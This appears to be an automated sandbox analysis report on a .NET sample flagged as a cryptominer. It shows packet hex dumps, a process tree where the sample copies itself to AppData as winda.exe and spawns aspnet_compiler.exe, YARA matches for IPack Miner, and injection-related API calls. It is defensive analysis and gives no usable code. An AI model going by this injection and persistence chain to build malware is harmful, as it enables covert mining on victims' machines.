                                                    Oct 8, 2021 14:29:11.277339935 CEST6336INData Raw: 1a a3 9b 17 05 93 ea 7f ce bb 7f dc 67 04 02 e3 df e4 10 40 28 a5 39 29 04 f1 c6 7f fa 29 40 28 e8 58 a4 11 6b 8c ff ea ad 63 05 df 71 7f 45 71 3f c7 e7 7f b8 eb 01 22 ba 1a a4 17 88 28 2c 20 10 03 c5 bf e0 79 83 7f e0 2e 5f ab ff 01 1c 80 a8 10
                                                    Data Ascii: g@(9))@(XkcqEq?"(, y._H6h!lA[@gjMwFX*f\#?*B(BxP-(xfT_~=meD--Z|5;W*_Kv5
                                                    Oct 8, 2021 14:29:11.277378082 CEST6338INData Raw: 11 1c 59 79 3a ad f2 88 d5 a2 54 ac f6 b4 7c 55 32 cf a5 32 72 4d 61 be aa ea 8b 45 97 8b 42 25 ad 09 3d 98 0e 77 39 69 59 cd e2 5e e2 e6 56 b7 69 a4 05 ab 43 9d 0d 87 34 77 14 2c a1 a2 51 f4 d9 ec e9 49 90 89 b7 3c ac 67 32 20 f4 4b 51 df 88 da
                                                    Data Ascii: Yy:T|U22rMaEB%=w9iY^ViC4w,QI<g2 KQq?c`A3!Z}W?/3{Y3`T/TvQZxby'^x`@ O~lQ72ParP`3']8q i<r+,
                                                    Oct 8, 2021 14:29:11.277426004 CEST6339INData Raw: f4 7a 5f fd df 74 b6 38 52 c3 86 88 6b f4 94 b3 90 4b d4 6b 92 e9 dd f8 46 f3 98 88 82 b2 ad cf 70 72 a4 9a d1 c5 b5 fa 7f 04 59 30 1c 79 91 3a 14 42 23 0c 9c 0a 40 c9 a4 92 d7 ea 0f 05 be 1b 3f cd a4 87 68 82 84 d2 ef 1d 1a a6 4f c2 28 f3 00 57
                                                    Data Ascii: z_t8RkKkFprY0y:B#@?hO(WVa(@`33A:;hxSMDXN!"d6IeYJ"9],Ho^}M^X]]EL:rOh.?u*R8<)`Y
                                                    Oct 8, 2021 14:29:11.338648081 CEST6341INData Raw: bb ab 5d 3e 3f d0 b2 18 bf ce 3e 53 32 0e ce 49 bc d3 1f d8 55 c4 0f 9d b6 f0 3d da 86 e4 4f dd bc e6 39 71 5e 3d 8b 0e 90 07 8f 22 b7 f5 7e fa 1d ba 52 ee 0d 7d a0 63 63 7e 4c b1 6e bb 2a d6 4a e6 59 61 21 13 d1 c2 98 d4 d7 19 60 8b ec 8f d8 fd
                                                    Data Ascii: ]>?>S2IU=O9q^="~R}cc~Ln*JYa!`X#O{Jy<v;=jl8Nd XcPVfx?={eoE9d!6YEyA(OZI/Us3DR+jP]gXjTZO


                                                    Code Manipulations

                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    Analysis Process: frF39bBsa7.exe PID: 4752 Parent PID: 5180

                                                    General

                                                    Start time:14:27:09
                                                    Start date:08/10/2021
                                                    Path:C:\Users\user\Desktop\frF39bBsa7.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Users\user\Desktop\frF39bBsa7.exe'
                                                    Imagebase:0x5c0000
                                                    File size:1271296 bytes
                                                    MD5 hash:F6A627B01B8AC665ADD87B047E732613
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: aspnet_compiler.exe PID: 1244 Parent PID: 4752

                                                    General

                                                    Start time:14:27:37
                                                    Start date:08/10/2021
                                                    Path:C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe
                                                    Imagebase:0x247508c0000
                                                    File size:54888 bytes
                                                    MD5 hash:7809A19AA8DA1A41F36B60B0664C4E20
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000007.00000002.559151379.0000024752700000.00000004.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000007.00000002.558664715.0000024752600000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000007.00000002.558195280.0000024752510000.00000004.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000003.519716575.00000247629EB000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.559261310.0000024752750000.00000004.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000007.00000002.559538947.00000247527C1000.00000004.00000001.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 0%, Metadefender, Browse
                                                    • Detection: 0%, ReversingLabs
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: winda.exe PID: 6604 Parent PID: 3352

                                                    General

                                                    Start time:14:27:46
                                                    Start date:08/10/2021
                                                    Path:C:\Users\user\AppData\Roaming\winda.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Users\user\AppData\Roaming\winda.exe'
                                                    Imagebase:0x490000
                                                    File size:1271296 bytes
                                                    MD5 hash:F6A627B01B8AC665ADD87B047E732613
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:.Net C# or VB.NET
                                                    Antivirus matches:
                                                    • Detection: 100%, Joe Sandbox ML
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: winda.exe PID: 6788 Parent PID: 3352

                                                    General

                                                    Start time:14:27:54
                                                    Start date:08/10/2021
                                                    Path:C:\Users\user\AppData\Roaming\winda.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Users\user\AppData\Roaming\winda.exe'
                                                    Imagebase:0xca0000
                                                    File size:1271296 bytes
                                                    MD5 hash:F6A627B01B8AC665ADD87B047E732613
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:.Net C# or VB.NET
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: aspnet_compiler.exe PID: 5900 Parent PID: 6604

                                                    General

                                                    Start time:14:28:15
                                                    Start date:08/10/2021
                                                    Path:C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe
                                                    Imagebase:0x14538ff0000
                                                    File size:54888 bytes
                                                    MD5 hash:7809A19AA8DA1A41F36B60B0664C4E20
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.505864982.000001453AD50000.00000004.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000012.00000002.506433736.000001453AEC5000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000012.00000002.505987468.000001453ADA0000.00000004.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.506221485.000001453AE51000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000012.00000002.506221485.000001453AE51000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000012.00000002.506304338.000001453AE82000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000012.00000002.506328241.000001453AE98000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000012.00000002.505581498.000001453AC60000.00000004.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.506737600.000001454AE51000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000012.00000002.507008971.000001454AEF7000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000012.00000002.506389041.000001453AEAF000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000012.00000002.508932929.0000014553500000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000012.00000002.507488204.000001454AFDA000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000012.00000002.507488204.000001454AFDA000.00000004.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: aspnet_compiler.exe PID: 2808 Parent PID: 6788

                                                    General

                                                    Start time:14:28:26
                                                    Start date:08/10/2021
                                                    Path:C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe
                                                    Imagebase:0x1e819df0000
                                                    File size:54888 bytes
                                                    MD5 hash:7809A19AA8DA1A41F36B60B0664C4E20
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.529430377.000001E81BC41000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000014.00000002.529430377.000001E81BC41000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000014.00000002.529532674.000001E81BC9F000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000014.00000002.529491843.000001E81BC88000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000014.00000002.529127824.000001E81BB40000.00000004.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.530094899.000001E82BDCA000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000014.00000002.530094899.000001E82BDCA000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000014.00000002.528940589.000001E81BAA0000.00000004.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.529218916.000001E81BB90000.00000004.00020000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000014.00000002.529469725.000001E81BC72000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000014.00000002.529584589.000001E81BCB5000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.529843907.000001E82BC41000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000014.00000002.530489015.000001E8342F0000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_IPackMiner, Description: Yara detected IPack Miner, Source: 00000014.00000002.529979223.000001E82BCE7000.00000004.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    Chronological Activities

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >

                                                      Analysis Process: frF39bBsa7.exe PID: 4752 Parent PID: 5180 frF39bBsa7.exeCOMMON

                                                      Executed Functions

                                                      Function 00007FFC0882B3EC, Relevance: 1.6, APIs: 1, Instructions: 109nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: SectionUnmapView
                                                      • String ID:
                                                      • API String ID: 498011366-0
                                                      • Opcode ID: 7fd948c4282907d7c8cd1111565b9b4f3c9109cdf86fd8bdf0aa9333defa6992
                                                      • Instruction ID: 5505b1dc56b07698ff76608809d392717e428a986e81d8f6bed2a605c7f021a1
                                                      • Opcode Fuzzy Hash: 7fd948c4282907d7c8cd1111565b9b4f3c9109cdf86fd8bdf0aa9333defa6992
                                                      • Instruction Fuzzy Hash: 0631093190CB588FDB19EB68980A6F97BE0EF56320F04417FD04EC3193DE64640AC791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882804F, Relevance: 2.2, APIs: 1, Instructions: 703libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 1744ad07f0e948f01cf05319094d62824b78d14a63c35eafb50dfc288584a1fd
                                                      • Instruction ID: 366815b0a99336bac15242e88fe2941767a9de15248642c9c8c39d891713852f
                                                      • Opcode Fuzzy Hash: 1744ad07f0e948f01cf05319094d62824b78d14a63c35eafb50dfc288584a1fd
                                                      • Instruction Fuzzy Hash: F761913090D78C8FDB46DB6888657A87FB1EF57310F0542EBC049DB2A3DA68584ACB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882B4D0, Relevance: 1.9, APIs: 1, Instructions: 434processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 081d79e29b8447ff9eb47e1be40b6f9cac3791afeb0601d3860145f49b65c3ab
                                                      • Instruction ID: 28c1a282f2888f2c1b898546869f305d30da52937f61ffcf765c98b87461d918
                                                      • Opcode Fuzzy Hash: 081d79e29b8447ff9eb47e1be40b6f9cac3791afeb0601d3860145f49b65c3ab
                                                      • Instruction Fuzzy Hash: 99D1C530918B8D8FEB64DF68DC467E977D1FB54320F10826AD84DC7282DB74A985CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882D7FC, Relevance: 1.8, APIs: 1, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: BaseModuleName
                                                      • String ID:
                                                      • API String ID: 595626670-0
                                                      • Opcode ID: ec04ce5ce3d57d679823fbf0dc66d79f62be56c9901e9e09f3baf44a16883f4a
                                                      • Instruction ID: 817d89e1731217e43bdaf8e197f952afbd33c5c0824fccc9905904e5e45487e3
                                                      • Opcode Fuzzy Hash: ec04ce5ce3d57d679823fbf0dc66d79f62be56c9901e9e09f3baf44a16883f4a
                                                      • Instruction Fuzzy Hash: C281A23150C68D8FEB68DF188845BF97BE0FF59311F10427AE84EC7292DA359846CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08828E7F, Relevance: 1.7, APIs: 1, Instructions: 201fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: CopyFile
                                                      • String ID:
                                                      • API String ID: 1304948518-0
                                                      • Opcode ID: 5505917d7fa6e671933f8d979dda15c010aa7f89a459e582426b649b1708c26b
                                                      • Instruction ID: 5a5c961bbd6fbcd76b9b71d2835eb41299e8e2b967ea198fbb3adec7610ca3b3
                                                      • Opcode Fuzzy Hash: 5505917d7fa6e671933f8d979dda15c010aa7f89a459e582426b649b1708c26b
                                                      • Instruction Fuzzy Hash: E151F33140E7D44FD7178BB888656A67FF0DF57220B0981EFC0C9CB5A3DA69580AC762
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882AFB8, Relevance: 1.7, APIs: 1, Instructions: 175COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d3a25532d7d913e506a21cc546cb1e1d32bac154d5d188a869f5ff82b557f689
                                                      • Instruction ID: d0c02970197bee72224aefeca3104b51c07711095f69d8009afcb60f1a339823
                                                      • Opcode Fuzzy Hash: d3a25532d7d913e506a21cc546cb1e1d32bac154d5d188a869f5ff82b557f689
                                                      • Instruction Fuzzy Hash: 86511B3190C7688FEB29DB6898056F97BE0EF56320F04427FD049C7193DA78680ACB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820A50, Relevance: 1.7, APIs: 1, Instructions: 159memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: d40a0e2e062fdf89eea74c124c975b2a9aa5d5fd9856d65a6bed485a79e2db2b
                                                      • Instruction ID: eb0b97d52e6bc32f15e5719c59093f579ff8cc9999bdcbfee12ed48901508094
                                                      • Opcode Fuzzy Hash: d40a0e2e062fdf89eea74c124c975b2a9aa5d5fd9856d65a6bed485a79e2db2b
                                                      • Instruction Fuzzy Hash: B7413B7190DB884FEB19D7AC58056B87FE0FB56311F0482BFD049C75D7CA64A80AC3A6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882DCD0, Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: ChildEnumWindows
                                                      • String ID:
                                                      • API String ID: 3555792229-0
                                                      • Opcode ID: fe6108a22874661210c2fabd7c340c49c90154bc1b45009fa51e7aea7015388c
                                                      • Instruction ID: 9631dfb5896b55ccbc27eb04cefc5c0b035beaa60a4b0a6227cf0c7fa1180b81
                                                      • Opcode Fuzzy Hash: fe6108a22874661210c2fabd7c340c49c90154bc1b45009fa51e7aea7015388c
                                                      • Instruction Fuzzy Hash: AA41C43190CB9C8FE71ADB6898166A97FF0EF56311F1441AFD08AC71D3DA646806CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820A60, Relevance: 1.7, APIs: 1, Instructions: 154memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: ea68b90ebfa12db9bbc1ceecc9dc5ad3db10e6b48cc74247bbb9c3e004ea5ebe
                                                      • Instruction ID: 97740eaebc52061184566a704b3022f47e5df627cb609253a5225332759000a6
                                                      • Opcode Fuzzy Hash: ea68b90ebfa12db9bbc1ceecc9dc5ad3db10e6b48cc74247bbb9c3e004ea5ebe
                                                      • Instruction Fuzzy Hash: 9A41197190DA884FDB18DB6C98056B87FE0FB56311F0442BFD049C35D3CA64A846C7A6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882D6D6, Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: EnumModulesProcess
                                                      • String ID:
                                                      • API String ID: 1082081703-0
                                                      • Opcode ID: 7a70b338772285e9fa936dd0cd7032230b34b33b21cea79f977db0c1892b6bea
                                                      • Instruction ID: 9e6c20511582232d66b8df56d599e3b18a015aa172b73a51e250fa3b03e667f4
                                                      • Opcode Fuzzy Hash: 7a70b338772285e9fa936dd0cd7032230b34b33b21cea79f977db0c1892b6bea
                                                      • Instruction Fuzzy Hash: 6A41173190CB8C8FDB199BA898066F9BBE0EF56321F04436FD049C3292DF746856C7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882880D, Relevance: 1.6, APIs: 1, Instructions: 137memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: c8e7ff1408a0bdecb1a9b5cf90ffcde120dcf5a7e614c9081a41708142bdc34c
                                                      • Instruction ID: 553ba6852836b8631959e891ca0e03ad89e72a17f2227030acae0f53eedc2f00
                                                      • Opcode Fuzzy Hash: c8e7ff1408a0bdecb1a9b5cf90ffcde120dcf5a7e614c9081a41708142bdc34c
                                                      • Instruction Fuzzy Hash: B241163190CB888FDB19DB689845AB97FF0EF56321F0442AFD049C3593CB646846C796
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882B2D0, Relevance: 1.6, APIs: 1, Instructions: 136injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: c454544350679986371627d9a12524edde1de8ab14bf03e586c0c7a47ecf42fc
                                                      • Instruction ID: d77e481a3691a27e2ef3c1c8983c8783726772c5c2635308a653ec62f9719583
                                                      • Opcode Fuzzy Hash: c454544350679986371627d9a12524edde1de8ab14bf03e586c0c7a47ecf42fc
                                                      • Instruction Fuzzy Hash: E741C43190CB5C8FDB18DB5898066E97BE0EF55320F04426FE04DD3292DF64A856CBD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820A90, Relevance: 1.6, APIs: 1, Instructions: 131memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: bce8a92c7fa07de20a115a99b1e6719556e0f413d7902cd9f64428e0078afdc4
                                                      • Instruction ID: dd3d65989a04d1094596399fea8f8d1eae796b88be03c1068c86407127a8b4ae
                                                      • Opcode Fuzzy Hash: bce8a92c7fa07de20a115a99b1e6719556e0f413d7902cd9f64428e0078afdc4
                                                      • Instruction Fuzzy Hash: 9F41057190CB884FDB18DB6898496B9BBF0FB65311F0442AFD04AC3593CB64A846C795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882B1C8, Relevance: 1.6, APIs: 1, Instructions: 130memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 9182efff02ac033d21b5136d30ab74367e3a2400e3487118f66e363ca8156814
                                                      • Instruction ID: f005f0dcc4e54eb482fd44f3546d25dd6908e0770d0cd6cce1d71edb4a21b865
                                                      • Opcode Fuzzy Hash: 9182efff02ac033d21b5136d30ab74367e3a2400e3487118f66e363ca8156814
                                                      • Instruction Fuzzy Hash: 0F31D63190CB4C8FDB19AB689806AF97BE0EF55320F00426FE14DC3692DE746856CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820AA0, Relevance: 1.6, APIs: 1, Instructions: 127memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 252110f7fba84a7c5b2c5c4bd5fb74653bb788c96d121876b0d618b22a83de03
                                                      • Instruction ID: a86419ce6f0ad3e20f2e1104fc2b3f3448b2b8fc9166573d5eaa9ac660d8a520
                                                      • Opcode Fuzzy Hash: 252110f7fba84a7c5b2c5c4bd5fb74653bb788c96d121876b0d618b22a83de03
                                                      • Instruction Fuzzy Hash: 2931157190CB8C8FDB18DBA898496B9BBF0FB65311F04427FD04AC3593CB64A846C795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882D228, Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: EnumProcesses
                                                      • String ID:
                                                      • API String ID: 84517404-0
                                                      • Opcode ID: e1da330a8ce834e5c325bbf90602c4fdd13e228da5ff59ce65a248c83bd98c10
                                                      • Instruction ID: ac6f58759cde63d20df7cc1606b0dd31fb330c9876d92a43fc13fc0a0d079e02
                                                      • Opcode Fuzzy Hash: e1da330a8ce834e5c325bbf90602c4fdd13e228da5ff59ce65a248c83bd98c10
                                                      • Instruction Fuzzy Hash: E931A23190CB1C8FDB28DF9D98596F97BE0EB65321F00416FE04AD3692CB74A849CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882DA76, Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: 6a525490b2741f14ea3d3146af469c301e82f2a72dcb51cbadf2e01ca34a48c4
                                                      • Instruction ID: 0b6ddca40a4b4d636bfbf5c4b70d7dd7130f89fb0b7a36e2ec7a686efd274da9
                                                      • Opcode Fuzzy Hash: 6a525490b2741f14ea3d3146af469c301e82f2a72dcb51cbadf2e01ca34a48c4
                                                      • Instruction Fuzzy Hash: 4C312C3190C68D8FDB19DB689815BE97FF0EF56320F0442AFD049C35D3DA646856CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08820AB0, Relevance: 1.6, APIs: 1, Instructions: 121memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: dd9738671af6416d2e7050c1af450a9aadd6c150a737e0c37f90cc087975beaf
                                                      • Instruction ID: 92661b1fd58cb097d3ac64645ce7e787a1fc4db65b4bf4949542e95af55dd72c
                                                      • Opcode Fuzzy Hash: dd9738671af6416d2e7050c1af450a9aadd6c150a737e0c37f90cc087975beaf
                                                      • Instruction Fuzzy Hash: B931E53090CA5C8FDB18DF9C98496B9BBE1FBA5311F04427FD04AD3692CB74A846C795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

